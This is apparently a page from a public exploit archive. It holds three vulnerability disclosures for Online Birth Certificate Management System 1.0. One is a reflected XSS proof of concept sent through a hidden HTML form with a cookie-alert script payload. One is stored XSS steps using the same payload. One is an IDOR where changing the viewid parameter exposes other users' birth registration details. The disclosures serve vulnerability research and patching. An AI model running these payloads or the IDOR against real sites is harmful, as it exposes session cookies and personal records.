    # Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> search recoder </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/search.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="searchdata" value="<script>alert(document.cookie);</script>">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="search">search</button>        </form>    </body></html></html>

Online Birth Certificate Management System 1.0 Cross Site Scripting

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

Posted Sep 27, 2022

Authored by Yousef Alraddadi

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86

Download | Favorite | View

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

    # Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Add Details.3) add full name payload => <script>alert(document.cookie);</script>4) and all field enter payload only Contact Number enter number

**File Tags**

*   ActiveX (932)
*   Advisory (78,276)
*   Arbitrary (15,276)
*   BBS (2,859)
*   Bypass (1,598)
*   CGI (1,013)
*   Code Execution (6,771)
*   Conference (671)
*   Cracker (799)
*   CSRF (3,277)
*   DoS (22,065)
*   Encryption (2,340)
*   Exploit (50,129)
*   File Inclusion (4,160)
*   File Upload (945)
*   Firewall (821)
*   Info Disclosure (2,565)
*   Intrusion Detection (861)
*   Java (2,823)
*   JavaScript (808)
*   Kernel (6,156)
*   Local (14,093)
*   Magazine (586)
*   Overflow (12,252)
*   Perl (1,413)
*   PHP (5,057)
*   Proof of Concept (2,284)
*   Protocol (3,350)
*   Python (1,406)
*   Remote (29,862)
*   Root (3,466)
*   Ruby (581)
*   Scanner (1,630)
*   Security Tool (7,737)
*   Shell (3,077)
*   Shellcode (1,203)
*   Sniffer (883)
*   Spoof (2,123)
*   SQL Injection (16,057)
*   TCP (2,369)
*   Trojan (682)
*   UDP (872)
*   Virus (660)
*   Vulnerability (30,657)
*   Web (9,114)
*   Whitepaper (3,723)
*   x86 (943)
*   XSS (17,396)
*   Other

**File Archives**

*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   Older

**Systems**

*   AIX (426)
*   Apple (1,899)
*   BSD (369)
*   CentOS (55)
*   Cisco (1,915)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,207)
*   HPUX (878)
*   iOS (323)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (42,923)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (12,009)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,027)
*   UNIX (9,115)
*   UnixWare (185)
*   Windows (6,473)
*   Other

Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,First Name, Phone number, and other data

Tag

#windows